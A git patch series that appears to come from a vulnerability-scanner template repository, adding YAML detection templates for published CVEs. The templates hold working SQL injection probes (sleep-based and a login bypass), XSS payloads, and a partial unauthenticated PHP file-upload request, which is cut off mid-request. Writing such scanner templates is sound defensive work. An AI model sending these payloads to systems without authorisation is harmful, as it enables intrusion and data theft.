the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module. + reference: + - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 + classification: + cve-id: CVE-2020-26248 + tags: cve,prestashop,productcomments,cve2020,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(5)))a)" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + + - type: status + status: + - 200 \ No newline at end of file From 37aaddf1ffc538f797ea652cc4045716d296f225 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Fri, 30 Sep 2022 19:18:41 +0200 Subject: [PATCH 0027/1415] Add CVE-2020-29284 --- cves/2020/CVE-2020-29284.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-29284.yaml diff --git a/cves/2020/CVE-2020-29284.yaml b/cves/2020/CVE-2020-29284.yaml new file mode 100644 index 0000000000..baf9ee5769 --- /dev/null +++ b/cves/2020/CVE-2020-29284.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-29284 + +info: + name: Multi Restaurant Table Reservation System 1.0 - SQL Injection + author: edoardottt + severity: critical + description: | + The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability. + reference: + - https://www.exploit-db.com/exploits/48984 + - https://nvd.nist.gov/vuln/detail/CVE-2020-29284 + classification: + cve-id: CVE-2020-29284 + tags: cve,tablereservation,cve2020,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+-" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + + - type: status + status: + - 200 \ No newline at end of file From c5a06b2786b8933cf0ba669ba8b45f625a1a9b2a Mon Sep 17 00:00:00 2001 From: edoardottt Date: Sat, 1 Oct 2022 15:26:09 +0200 Subject: [PATCH 0028/1415] Add CVE-2022-0349 --- cves/2022/CVE-2022-0349.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2022/CVE-2022-0349.yaml diff --git a/cves/2022/CVE-2022-0349.yaml b/cves/2022/CVE-2022-0349.yaml new file mode 100644 index 0000000000..2a246adf43 --- /dev/null +++ b/cves/2022/CVE-2022-0349.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-0349 + +info: + name: NotificationX WordPress plugin < 2.3.9 - SQL Injection + author: edoardottt + severity: critical + description: | + The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection. + reference: + - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a + - https://nvd.nist.gov/vuln/detail/CVE-2022-0349 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0349 + classification: + cve-id: CVE-2022-0349 + tags: cve,notificationx,wordpress,wordpressplugin,sqli + +requests: + - raw: + - | + POST /?rest_route=/notificationx/v1/analytics HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nx_id%3Dsleep(5)%20--%20x + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + + - type: status + status: + - 200 \ No newline at end of file From 1ed2d4f7b19dd6d6d087f902da40c0096adb48c4 Mon Sep 17 00:00:00 2001 From: vrenzolaverace Date: Sat, 1 Oct 2022 15:32:00 +0200 Subject: [PATCH 0029/1415] Update CVE-2022-0349.yaml --- cves/2022/CVE-2022-0349.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-0349.yaml b/cves/2022/CVE-2022-0349.yaml index 2a246adf43..462bd2f525 100644 --- a/cves/2022/CVE-2022-0349.yaml +++ b/cves/2022/CVE-2022-0349.yaml @@ -12,7 +12,7 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0349 classification: cve-id: CVE-2022-0349 - tags: cve,notificationx,wordpress,wordpressplugin,sqli + tags: cve,notificationx,wordpress,wordpressplugin,sqli,cve2022 requests: - raw: @@ -31,4 +31,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 89aeb451d88b426a5522855e81dac5ed678865cf Mon Sep 17 00:00:00 2001 From: vrenzolaverace Date: Sat, 1 Oct 2022 15:54:56 +0200 Subject: [PATCH 0030/1415] Update CVE-2020-21012.yaml --- cves/2020/CVE-2020-21012.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml index 7d8b2e01e4..551c9681ec 100644 --- a/cves/2020/CVE-2020-21012.yaml +++ b/cves/2020/CVE-2020-21012.yaml @@ -20,7 +20,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - btn_forgot=1&email=1' or sleep(5)%23 + btn_forgot=1&email=1%27%20or%20sleep(5)%23 matchers-condition: and matchers: @@ -30,4 +30,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 3517adc985dfb6ce9160c418c413d59abf7218a7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 4 Oct 2022 14:25:13 +0530 Subject: [PATCH 0031/1415] Update CVE-2022-0349.yaml --- cves/2022/CVE-2022-0349.yaml | 35 +++++++++++++++++++---------------- 1 file changed, 19 insertions(+), 16 deletions(-) diff --git a/cves/2022/CVE-2022-0349.yaml b/cves/2022/CVE-2022-0349.yaml index 462bd2f525..eca8421488 100644 --- a/cves/2022/CVE-2022-0349.yaml +++ b/cves/2022/CVE-2022-0349.yaml @@ -1,27 +1,25 @@ -id: CVE-2022-0349 +id: CVE-2022-0412 info: - name: NotificationX WordPress plugin < 2.3.9 - SQL Injection + name: TI WooCommerce Wishlist WP plugin < 1.40.1 - SQL Injection author: edoardottt severity: critical description: | - The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection. + The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks. reference: - - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a - - https://nvd.nist.gov/vuln/detail/CVE-2022-0349 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0349 + - https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682 + - https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0412 classification: - cve-id: CVE-2022-0349 - tags: cve,notificationx,wordpress,wordpressplugin,sqli,cve2022 + cve-id: CVE-2022-0412 + metadata: + verified: true + tags: cve,cve2022,woocommerce,wordpress,wp-plugin,wp,sqli requests: - - raw: - - | - POST /?rest_route=/notificationx/v1/analytics HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - nx_id%3Dsleep(5)%20--%20x + - method: GET + path: + - "{{BaseURL}}/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g" matchers-condition: and matchers: @@ -29,6 +27,11 @@ requests: dsl: - 'duration>=5' + - type: word + part: body + words: + - 'Product not found' + - type: status status: - - 200 + - 400 From 1baf1e9f045082323cf755ed83a720c861d43219 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Tue, 4 Oct 2022 14:28:45 +0530 Subject: [PATCH 0032/1415] Revert "Update CVE-2022-0349.yaml" This reverts commit 3517adc985dfb6ce9160c418c413d59abf7218a7. --- cves/2022/CVE-2022-0349.yaml | 35 ++++++++++++++++------------------- 1 file changed, 16 insertions(+), 19 deletions(-) diff --git a/cves/2022/CVE-2022-0349.yaml b/cves/2022/CVE-2022-0349.yaml index eca8421488..462bd2f525 100644 --- a/cves/2022/CVE-2022-0349.yaml +++ b/cves/2022/CVE-2022-0349.yaml @@ -1,25 +1,27 @@ -id: CVE-2022-0412 +id: CVE-2022-0349 info: - name: TI WooCommerce Wishlist WP plugin < 1.40.1 - SQL Injection + name: NotificationX WordPress plugin < 2.3.9 - SQL Injection author: edoardottt severity: critical description: | - The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks. + The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection. reference: - - https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682 - - https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0412 + - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a + - https://nvd.nist.gov/vuln/detail/CVE-2022-0349 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0349 classification: - cve-id: CVE-2022-0412 - metadata: - verified: true - tags: cve,cve2022,woocommerce,wordpress,wp-plugin,wp,sqli + cve-id: CVE-2022-0349 + tags: cve,notificationx,wordpress,wordpressplugin,sqli,cve2022 requests: - - method: GET - path: - - "{{BaseURL}}/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g" + - raw: + - | + POST /?rest_route=/notificationx/v1/analytics HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nx_id%3Dsleep(5)%20--%20x matchers-condition: and matchers: @@ -27,11 +29,6 @@ requests: dsl: - 'duration>=5' - - type: word - part: body - words: - - 'Product not found' - - type: status status: - - 400 + - 200 From 16bb08ba3d1181bd0c308d1250dfd36a01755b15 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Tue, 4 Oct 2022 14:58:20 +0200 Subject: [PATCH 0033/1415] Add CVE-2022-40359 --- cves/2022/CVE-2022-40359.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2022/CVE-2022-40359.yaml diff --git a/cves/2022/CVE-2022-40359.yaml b/cves/2022/CVE-2022-40359.yaml new file mode 100644 index 0000000000..9ec17e0b99 --- /dev/null +++ b/cves/2022/CVE-2022-40359.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-40359 + +info: + name: kfm 1.4.7 - Cross Site Scripting + author: edoardottt + severity: medium + description: | + Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php. + reference: + - https://cxsecurity.com/issue/WLB-2022090057 + - https://nvd.nist.gov/vuln/detail/CVE-2022-40359 + classification: + cve-id: CVE-2022-40359 + tags: xss,kfm,cve,cve2022 + +requests: + - raw: + - | + @timeout: 10s + GET /kfm/index.php/'%3Cscript%3Ealert(document.domain);%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" \ No newline at end of file From 5f5085bea9547bfd88f3d2a5b8577edc952aef1f Mon Sep 17 00:00:00 2001 From: edoardottt Date: Tue, 4 Oct 2022 19:05:30 +0200 Subject: [PATCH 0034/1415] update CVE-2022-40359 --- cves/2022/CVE-2022-40359.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-40359.yaml b/cves/2022/CVE-2022-40359.yaml index 9ec17e0b99..d567a66ccf 100644 --- a/cves/2022/CVE-2022-40359.yaml +++ b/cves/2022/CVE-2022-40359.yaml @@ -1,8 +1,8 @@ id: CVE-2022-40359 info: - name: kfm 1.4.7 - Cross Site Scripting - author: edoardottt + name: kfm <= 1.4.7 - Reflected Cross-Site Scripting + author: edoardottt,daffainfo severity: medium description: | Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php. @@ -17,7 +17,7 @@ requests: - raw: - | @timeout: 10s - GET /kfm/index.php/'%3Cscript%3Ealert(document.domain);%3C/script%3E HTTP/1.1 + GET /kfm/index.php/' HTTP/1.1 Host: {{Hostname}} matchers-condition: and @@ -34,4 +34,7 @@ requests: - type: word part: body words: - - "" \ No newline at end of file + - "" + - "x_kfm_changeCaption" + - "kfm_copyFiles" + condition: and \ No newline at end of file From d9e5fec8e2b5c97ad57dbbb288f878a90044e023 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Thu, 6 Oct 2022 10:11:10 +0200 Subject: [PATCH 0035/1415] Add CVE-2022-26263 --- cves/2022/CVE-2022-26263.yaml | 41 +++++++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 cves/2022/CVE-2022-26263.yaml diff --git a/cves/2022/CVE-2022-26263.yaml b/cves/2022/CVE-2022-26263.yaml new file mode 100644 index 0000000000..aba4a3cce1 --- /dev/null +++ b/cves/2022/CVE-2022-26263.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-26263 + +info: + name: Yonyou u8 v13.0 - Cross Site Scripting + author: edoardottt + severity: medium + description: | + Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp. + reference: + - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-26263 + classification: + cve-id: CVE-2022-26263 + metadata: + google-dork: inurl:/u8sl/WebHelp + tags: xss,yonyou,cve,cve2022 + +requests: + - raw: + - | + @timeout: 10s + GET /U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"'">()locxss")#javascript:alert(document.domain) HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" + - "" + condition: and \ No newline at end of file From 7be1679c1dbed84c247088236c2665fc933e52cc Mon Sep 17 00:00:00 2001 From: edoardottt Date: Thu, 6 Oct 2022 10:33:56 +0200 Subject: [PATCH 0036/1415] Add CVE-2022-1883 --- cves/2022/CVE-2022-1883.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2022/CVE-2022-1883.yaml diff --git a/cves/2022/CVE-2022-1883.yaml b/cves/2022/CVE-2022-1883.yaml new file mode 100644 index 0000000000..8c86818b40 --- /dev/null +++ b/cves/2022/CVE-2022-1883.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-1883 + +info: + name: camptocamp/terraboard < 2.2.0 - SQL Injection + author: edoardottt + severity: critical + description: | + SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0. + reference: + - https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1883 + classification: + cve-id: CVE-2022-1883 + tags: cve,terraboard,cve2022,sqli + +requests: + - raw: + - | + @timeout: 10s + GET /api/search/attribute?tf_version='+OR+pg_sleep(5)+OR+states.tf_version+LIKE+'%" HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + + - type: status + status: + - 200 \ No newline at end of file From cf91e7519247cd996228d06f8ff8f04fa4fec97d Mon Sep 17 00:00:00 2001 From: edoardottt Date: Thu, 6 Oct 2022 11:04:17 +0200 Subject: [PATCH 0037/1415] Add CVE-2021-43510 --- cves/2021/CVE-2021-43510.yaml | 40 +++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 cves/2021/CVE-2021-43510.yaml diff --git a/cves/2021/CVE-2021-43510.yaml b/cves/2021/CVE-2021-43510.yaml new file mode 100644 index 0000000000..cc4896ca26 --- /dev/null +++ b/cves/2021/CVE-2021-43510.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-43510 + +info: + name: Simple Client Management System 1.0 - SQL Injection + author: edoardottt + severity: critical + description: | + SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php. + reference: + - https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510 + - https://nvd.nist.gov/vuln/detail/CVE-2021-43510 + classification: + cve-id: CVE-2021-43510 + tags: cve,cve2021,sourcecodester,simpleclientmanagement,sqli + +requests: + - raw: + - | + @timeout: 10s + POST /cms/classes/Login.php?f=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin'+or+'1'%3d'1'--+-&password=as + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "{\"status\":\"success\"}" \ No newline at end of file From fb1ba83213c6bf9d204382d91d140da2d74dece5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Oct 2022 15:20:27 +0530 Subject: [PATCH 0038/1415] Update CVE-2022-26263.yaml --- cves/2022/CVE-2022-26263.yaml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/cves/2022/CVE-2022-26263.yaml b/cves/2022/CVE-2022-26263.yaml index aba4a3cce1..2ea0516b4b 100644 --- a/cves/2022/CVE-2022-26263.yaml +++ b/cves/2022/CVE-2022-26263.yaml @@ -13,7 +13,7 @@ info: cve-id: CVE-2022-26263 metadata: google-dork: inurl:/u8sl/WebHelp - tags: xss,yonyou,cve,cve2022 + tags: cve,cve2022,xss,yonyou requests: - raw: @@ -24,18 +24,18 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - "" + - "" + condition: and - type: word part: header words: - "text/html" - - type: word - part: body - words: - - "" - - "" - condition: and \ No newline at end of file + - type: status + status: + - 200 From 51d0a049e984063838f6cf7adb8afafc5bc5ec7b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 12 Oct 2022 21:59:35 +0530 Subject: [PATCH 0039/1415] Update CVE-2022-26263.yaml --- cves/2022/CVE-2022-26263.yaml | 32 ++++++++++---------------------- 1 file changed, 10 insertions(+), 22 deletions(-) diff --git a/cves/2022/CVE-2022-26263.yaml b/cves/2022/CVE-2022-26263.yaml index 2ea0516b4b..b7b4713108 100644 --- a/cves/2022/CVE-2022-26263.yaml +++ b/cves/2022/CVE-2022-26263.yaml @@ -2,7 +2,7 @@ id: CVE-2022-26263 info: name: Yonyou u8 v13.0 - Cross Site Scripting - author: edoardottt + author: edoardottt,theamanrawat severity: medium description: | Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp. @@ -12,30 +12,18 @@ info: classification: cve-id: CVE-2022-26263 metadata: + verified: true google-dork: inurl:/u8sl/WebHelp - tags: cve,cve2022,xss,yonyou + tags: cve,cve2022,yonyou,xss -requests: - - raw: - - | - @timeout: 10s - GET /U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"'">()locxss")#javascript:alert(document.domain) HTTP/1.1 - Host: {{Hostname}} +headless: + - steps: + - args: + url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27">()locxss")#javascript:console.log(document.domain)' + action: navigate + - action: waitload - matchers-condition: and matchers: - type: word - part: body words: - - "" - - "" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 + - ' Date: Fri, 14 Oct 2022 18:22:00 +0200 Subject: [PATCH 0040/1415] Fix github-refresh-token --- file/keys/github/github-refresh-token.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/github/github-refresh-token.yaml b/file/keys/github/github-refresh-token.yaml index ea3aab8094..15b1684157 100644 --- a/file/keys/github/github-refresh-token.yaml +++ b/file/keys/github/github-refresh-token.yaml @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - "ghr_.{36}" + - "ghr_.{76}" From 83b82ad6882810a734199b95a952ddcc289395c0 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 18 Oct 2022 20:48:04 +0700 Subject: [PATCH 0041/1415] fix: false negative keycloak - Fix the matcher to reduce false negative - Added metadata information --- exposed-panels/key-cloak-admin-panel.yaml | 24 ------------------ exposed-panels/keycloak-admin-panel.yaml | 30 +++++++++++++++++++++++ 2 files changed, 30 insertions(+), 24 deletions(-) delete mode 100644 exposed-panels/key-cloak-admin-panel.yaml create mode 100644 exposed-panels/keycloak-admin-panel.yaml diff --git a/exposed-panels/key-cloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml deleted file mode 100644 index 3b757d7c18..0000000000 --- a/exposed-panels/key-cloak-admin-panel.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: key-cloak-admin-panel - -info: - name: Keycloak Admin Panel - author: incogbyte,righettod - severity: info - tags: panel,keycloak - -requests: - - method: GET - path: - - "{{BaseURL}}/auth/admin/master/console/" - - "{{BaseURL}}/auth/admin" - - host-redirects: true - max-redirects: 2 - matchers: - - - type: word - words: - - "" - - "keycloak" - part: body - condition: or diff --git a/exposed-panels/keycloak-admin-panel.yaml b/exposed-panels/keycloak-admin-panel.yaml new file mode 100644 index 0000000000..8f2f2b35c7 --- /dev/null +++ b/exposed-panels/keycloak-admin-panel.yaml @@ -0,0 +1,30 @@ +id: keycloak-admin-panel + +info: + name: Keycloak Admin Panel + author: incogbyte,righettod,daffainfo + severity: info + metadata: + verified: true + shodan-query: http.favicon.hash:-1105083093 + tags: panel,keycloak + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/admin" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '/keycloak/img/favicon.ico' + - 'kc-form-buttons' + condition: and + + - type: status + status: + - 200 From 4de5639e58d007f014ed1d1b7cb2f10a5de6b3c0 Mon Sep 17 00:00:00 2001 From: Joshua Rogers Date: Wed, 19 Oct 2022 00:10:49 +0200 Subject: [PATCH 0042/1415] Fix typo in unaunthenticated-jenkin.yaml --- vulnerabilities/jenkins/unaunthenticated-jenkin.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml b/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml index 009d85a125..8a73df9b2f 100644 --- a/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml +++ b/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml @@ -1,4 +1,4 @@ -id: unaunthenticated-jenkin +id: unauthenticated-jenkin info: name: Unauthenticated Jenkins Dashboard From fe2cc413459367960d69e34aa6583a0fa8ff571a Mon Sep 17 00:00:00 2001 From: Joshua Rogers Date: Wed, 19 Oct 2022 00:14:05 +0200 Subject: [PATCH 0043/1415] Rename unaunthenticated-jenkin.yaml to unauthenticated-jenkins.yaml --- ...{unaunthenticated-jenkin.yaml => unauthenticated-jenkins.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/jenkins/{unaunthenticated-jenkin.yaml => unauthenticated-jenkins.yaml} (100%) diff --git a/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml b/vulnerabilities/jenkins/unauthenticated-jenkins.yaml similarity index 100% rename from vulnerabilities/jenkins/unaunthenticated-jenkin.yaml rename to vulnerabilities/jenkins/unauthenticated-jenkins.yaml From 1b437049ba95709f6ea650909aca064f3d227d8d Mon Sep 17 00:00:00 2001 From: Joshua Rogers Date: Wed, 19 Oct 2022 00:30:28 +0200 Subject: [PATCH 0044/1415] Add CVE-2018-1207.yaml exploit to Dell iDRAC workflow --- workflows/dell-idrac-workflow.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index 9e3b04a9f6..ef2a2c74f8 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -2,7 +2,7 @@ id: dell-idrac-workflow info: name: Dell iDRAC Security Checks - author: kophjager007 + author: kophjager007, megamansec description: A workflow to identify Dell iDRAC instances and run all related nuclei templates. workflows: @@ -12,10 +12,12 @@ workflows: - template: technologies/dell/dell-idrac7-detect.yaml subtemplates: + - template: cves/2018/CVE-2018-1207.yaml - template: default-logins/dell/dell-idrac-default-login.yaml - template: technologies/dell/dell-idrac8-detect.yaml subtemplates: + - template: cves/2018/CVE-2018-1207.yaml - template: default-logins/dell/dell-idrac-default-login.yaml - template: technologies/dell/dell-idrac9-detect.yaml From 43eafee24ca4ea042d314fdfeacd01dab66a1a22 Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Thu, 27 Oct 2022 16:16:04 -0300 Subject: [PATCH 0045/1415] CISCO WebVPN detect --- exposed-panels/cisco/cisco-webvpn-detect.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 exposed-panels/cisco/cisco-webvpn-detect.yaml diff --git a/exposed-panels/cisco/cisco-webvpn-detect.yaml b/exposed-panels/cisco/cisco-webvpn-detect.yaml new file mode 100644 index 0000000000..fa0d6dfd70 --- /dev/null +++ b/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -0,0 +1,40 @@ +id: cisco-webvpn-detect +info: + name: CISCO WebVPN detect + author: ricardomaia + severity: info + reference: + - https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/ + tags: panel,cisco,vpn + metadata: + fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg==" + google-query: intitle:"SSLVPN Service" + +requests: + - method: GET + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + path: + - "{{BaseURL}}/webvpn.html" + - "{{BaseURL}}" + matchers: + - type: word + case-insensitive: true + condition: or + part: header + words: + - "webvpncontext" + - "CISCO" + - "AnyConnect" + - "SSL_Context" + - "WEBVPN" + - type: word + case-insensitive: true + condition: or + part: body + words: + - "CISCO" + - "AnyConnect" + - "SSLVPN Service" From 3555eff71c23b0f2c202fc7cd718264478739acc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 28 Oct 2022 18:19:33 +0530 Subject: [PATCH 0046/1415] Update CVE-2022-26263.yaml --- cves/2022/CVE-2022-26263.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-26263.yaml b/cves/2022/CVE-2022-26263.yaml index b7b4713108..3f1efc4593 100644 --- a/cves/2022/CVE-2022-26263.yaml +++ b/cves/2022/CVE-2022-26263.yaml @@ -19,7 +19,7 @@ info: headless: - steps: - args: - url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27">()locxss")#javascript:console.log(document.domain)' + url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27">()locxss")#javascript:console.log(document.domain)' action: navigate - action: waitload From ae502c0bb7c41d11a7c776095c20c13ae2345f96 Mon Sep 17 00:00:00 2001 From: Aman Date: Sat, 29 Oct 2022 04:20:01 -0700 Subject: [PATCH 0047/1415] Added template for CVE-2022-1952 --- cves/2022/CVE-2022-1952.yaml | 72 ++++++++++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 cves/2022/CVE-2022-1952.yaml diff --git a/cves/2022/CVE-2022-1952.yaml b/cves/2022/CVE-2022-1952.yaml new file mode 100644 index 0000000000..10c3f61ffd --- /dev/null +++ b/cves/2022/CVE-2022-1952.yaml @@ -0,0 +1,72 @@ +id: CVE-2022-1952 + +info: + name: eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload + author: theamanrawat + severity: critical + description: | + The Free Booking Plugin for Hotels, Restaurant and Car Rental WordPress plugin before 1.1.16 suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps. + reference: + - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04 + - https://wordpress.org/plugins/easync-booking/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1952 + classification: + cve-id: CVE-2022-1952 + metadata: + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,file-upload,easync-booking,uauth + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37 + Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059 + + --------------------------98efee55508c5059 + Content-Disposition: form-data; name="action" + + easync_session_store + --------------------------98efee55508c5059 + Content-Disposition: form-data; name="type" + + car + --------------------------98efee55508c5059 + Content-Disposition: form-data; name="with_driver" + + self-driven + --------------------------98efee55508c5059 + Content-Disposition: form-data; name="driver_license_image2"; filename="evil.php" + Content-Type: application/octet-stream + + + + --------------------------98efee55508c5059-- + + - | + GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1 + Host: 